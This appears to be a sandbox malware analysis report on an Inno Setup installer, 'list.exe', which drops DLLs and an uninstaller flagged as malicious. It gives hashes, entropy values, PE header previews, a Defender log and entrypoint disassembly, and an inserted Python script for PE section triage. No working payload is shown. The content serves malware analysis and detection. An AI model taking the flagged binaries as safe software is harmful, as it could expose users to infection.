                                                                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445440
                                                                                                                                      Entropy (8bit):6.439135831549689
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                                                      MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                                                      SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                                                      SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                                                      SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):265728
                                                                                                                                      Entropy (8bit):6.4472652154517345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                                                                                      MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                                                                                      SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                                                                                      SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                                                                                      SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):78183
                                                                                                                                      Entropy (8bit):7.692742945771669
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445440
                                                                                                                                      Entropy (8bit):6.439135831549689
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                                                      MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                                                      SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                                                      SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                                                      SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):499712
                                                                                                                                      Entropy (8bit):6.414789978441117
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348160
                                                                                                                                      Entropy (8bit):6.542655141037356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):645592
                                                                                                                                      Entropy (8bit):6.50414583238337
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):717985
                                                                                                                                      Entropy (8bit):6.514892762109474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:5TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+cIq5MRxyFW:pPcYn5c/rPx37/zHBA6pFptZ1CEhqMRP
                                                                                                                                      MD5:3D980E66654B6000D5D70CF137B56E1B
                                                                                                                                      SHA1:49CC7B58DD461A21F2AB81545D71820B7DF921EA
                                                                                                                                      SHA-256:73653CC7CF03FD06D7396E928CA524CD391B2BD061B031DA99F4E81E161B14B2
                                                                                                                                      SHA-512:1F901F98FA687FFA86D2B07FC9D0123444889D4BC4C1C2AD29E2F3750D3F7DAB3CEB87ED8FA4F62BB8E063234699EE2ACB39416418A188499ABA5DB301D10531
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:InnoSetup Log Brekkiesoft Video Capture, version 0x30, 5065 bytes, 216865\user, "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33"
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5065
                                                                                                                                      Entropy (8bit):4.833268307173751
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:1UYCdWb38MpQ6c79f+eOIhua7ICSss/Lnv2XNR4:1wdWb3npQwHIhZICSsAnA4
                                                                                                                                      MD5:0128936CB7758CDFDF4B66AB01827F1B
                                                                                                                                      SHA1:CFAFFE7AE0B328890D9B875CAADA758EE955F49D
                                                                                                                                      SHA-256:8551C93FEE4795CA4F6B7BECD35921A82460E94DF77A0EF1663E5B2C26908767
                                                                                                                                      SHA-512:D8591FFC7138FECB38320E334216B2EFCA988C9A32DD97945355B30793532789302131F72826548848A1478E3BC96224CF1FEC0ABD920AF577DCF66C22AC7D29
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Inno Setup Uninstall Log (b)....................................Brekkiesoft Video Capture.......................................................................................................Brekkiesoft Video Capture.......................................................................................................0...........%................................................................................................................g............78......c....216865.user?C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33...........;...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess...
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):717985
                                                                                                                                      Entropy (8bit):6.514892762109474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:5TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+cIq5MRxyFW:pPcYn5c/rPx37/zHBA6pFptZ1CEhqMRP
                                                                                                                                      MD5:3D980E66654B6000D5D70CF137B56E1B
                                                                                                                                      SHA1:49CC7B58DD461A21F2AB81545D71820B7DF921EA
                                                                                                                                      SHA-256:73653CC7CF03FD06D7396E928CA524CD391B2BD061B031DA99F4E81E161B14B2
                                                                                                                                      SHA-512:1F901F98FA687FFA86D2B07FC9D0123444889D4BC4C1C2AD29E2F3750D3F7DAB3CEB87ED8FA4F62BB8E063234699EE2ACB39416418A188499ABA5DB301D10531
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2560
                                                                                                                                      Entropy (8bit):2.8818118453929262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                      MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                      SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                      SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                      SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
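The Entropy (8bit) value and the section names visible in the PE previews (.text/.rdata/.data for MSVC-built DLLs, CODE/DATA/BSS for the Delphi-built Inno Setup uninstaller) are the two things a triager normally checks on a dropped file before opening it in a disassembler. The Python below is an example added here, not Joe Sandbox code and not code extracted from the sample: it computes 8-bit Shannon entropy on the same scale as the report's field, parses the PE section table with the standard library only, and flags sections that are writable and executable or high-entropy. The PE it runs on is constructed inline by a hypothetical build_sample_pe() helper, and the 7.0 threshold is an assumption, not the threshold the report uses for its Encrypted flag.

```python
import math
import struct
from collections import Counter

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the scale of the Entropy (8bit) field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table; one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _symp, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(nsec):
        (name, _vsize, vaddr, raw_size, raw_ptr,
         _relp, _linp, _nrel, _nlin, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr,
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 3),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return sections


def triage(pe: bytes, high_entropy: float = 7.0) -> list:
    """Findings worth a second look: W+X sections and high-entropy (packed/encrypted) sections.
    The 7.0 cut-off is an assumption for this example."""
    findings = []
    for s in parse_sections(pe):
        if s["executable"] and s["writable"]:
            findings.append(f"{s['name']}: writable and executable section")
        if s["raw_size"] and s["entropy"] >= high_entropy:
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f}, likely packed or encrypted")
    return findings


def build_sample_pe(sections: list) -> bytes:
    """Hypothetical helper: assemble a minimal PE32 (DOS header, PE signature, COFF header,
    zero-length optional header, section table, 512-byte-aligned raw data) from
    (name, data, characteristics) tuples. Good enough for parse_sections(); Windows would not load it."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    headers_len = len(dos) + 4 + len(coff) + 40 * len(sections)
    raw_base = (headers_len + 0x1FF) & ~0x1FF
    table, body = b"", b""
    for i, (name, data, chars) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0x1000 * (i + 1),
                             len(data), raw_base + len(body), 0, 0, 0, 0, chars)
        body += data
    return dos + b"PE\0\0" + coff + table + b"\0" * (raw_base - headers_len) + body


# Constructed sample, not one of the dropped files listed above: a flat .text of NOPs and RETs,
# and a writable+executable section holding uniformly distributed bytes (entropy exactly 8.0).
SAMPLE_PE = build_sample_pe([
    (b".text", b"\x90" * 512 + b"\xC3" * 512,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".packed", bytes(range(256)) * 16,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    print(f"whole-file entropy: {shannon_entropy(SAMPLE_PE):.3f}")
    for section in parse_sections(SAMPLE_PE):
        print(section)
    for finding in triage(SAMPLE_PE):
        print("!", finding)
```

To apply it to a real dropped file, replace SAMPLE_PE with the bytes read from disk and compare shannon_entropy() of the whole file against the Entropy (8bit) field of the matching hash; a per-section view is more useful than the whole-file number because a small encrypted payload section can hide behind a large low-entropy resource section.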

Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.289297026665552
Encrypted:false
SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):23312
Entropy (8bit):4.596242908851566
Encrypted:false
SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\list.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):706560
Entropy (8bit):6.506373118469941
Encrypted:false
SSDEEP:12288:RTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+cIq5MRxyF:xPcYn5c/rPx37/zHBA6pFptZ1CEhqMRU
MD5:048F12CF9C44FE7D997B30F23A9A2228
SHA1:69949E9892B85A52869EE2F87BF09B19B4F1496B
SHA-256:B3724BBFDF84CAAD3D390F27EF5EB513909BBF5389900BEFF465332317E56AAB
SHA-512:5836BB02DB7F5DDB24823566B11324DAF657B32CC4AFB36BC8920F4874EB68C2C0A3964FCCA6E59423C5911F0907906C91217F3D132788AB41E50D53443CAAED
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%

Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):2464
Entropy (8bit):3.2438748051583297
Encrypted:false
SSDEEP:24:QOaqdmuF3rle+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxB:FaqdF7Q+AAHdKoqKFxcxkFQ
MD5:4E9FC410B5A5842283AC62CA5D8AC9A4
SHA1:8D4901B6E35A91D3172D7DCCBBA27502255C5C15
SHA-256:8B4D98B39EF844C43DBE6E135E8CEE088A7B9D4A13DDFA01863A6280CDFA239E
SHA-512:A9393022B5EDDE5D2E3A68E1DD5C751C26E0CBD50BD22A7F3EBEB2CA44875DC67CF02BD6663ECB01EA32B4C25B1A718F760407A96C86F356007C3918CF943856
Malicious:false
Preview (UTF-16 text decoded):
  -------------------------------------------------------------------------------------
  MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
  Start Time: Wed Dec 18 2024 09:47:57
  MpEnsureProcessMitigationPolicy: hr = 0x1
  WDEnable
  *********************************** WSC State Info *************************
  *********************************** AntiVirusProduct *************************
  displayName = [Windows Defender]
  pathToSignedProductExe = [windowsd

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.997854259362869
TrID:
• Win32 Executable (generic) a (10002005/4) 98.73%
• Inno Setup installer (109748/4) 1.08%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
File name:list.exe
File size:3'575'195 bytes
MD5:8eabea9b74251fe67f24b87e54486643
SHA1:b8549e3abe3828be7164e507414658df238c2652
SHA256:ec252c14b60754a9e280e0e4624077fcc3af03347f1a585b539f8d100777ad22
SHA512:679c2670888550d067c9b6c16c03a274a9aeacad39bd46696606e1b511969229d381ca411f46255d40dba82cf6e1a27d3a5a87722178dc555d3a0e57dd571b9d
SSDEEP:49152:C9B1GnidpX+FpdIpo4aNG062AuX3T723CraiaSTR8ZKxgkgw5KM3xAQY77DvEbl5:MB1wwRmIkeuHG3CzTbekgw59MgpGQ5f9
TLSH:15F5339121834679F6F209732C74C3B227BB6B1F59F86E6698DC4E48AF33258A241F45
Icon Hash:2d2e3797b32b2b99
Entrypoint:0x40a5f8
Entrypoint Section:CODE
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:1
OS Version Minor:0
File Version Major:1
File Version Minor:0
Subsystem Version Major:1
Subsystem Version Minor:0
Import Hash:884310b1928934402ea6fec1dbd3cf5e

Entrypoint disassembly (Instruction)
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007FEF691DC5F3h
call 00007FEF691DD7FAh
call 00007FEF691DDA89h
call 00007FEF691DDB2Ch
call 00007FEF691DFACBh
call 00007FEF691E2436h
call 00007FEF691E259Dh
xor eax, eax
push ebp
push 0040ACC9h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040AC92h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007FEF691E304Bh
call 00007FEF691E2C36h
cmp byte ptr [0040B234h], 00000000h
je 00007FEF691E3B2Eh
call 00007FEF691E3148h
xor eax, eax
call 00007FEF691DD2E9h
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007FEF691E00DBh
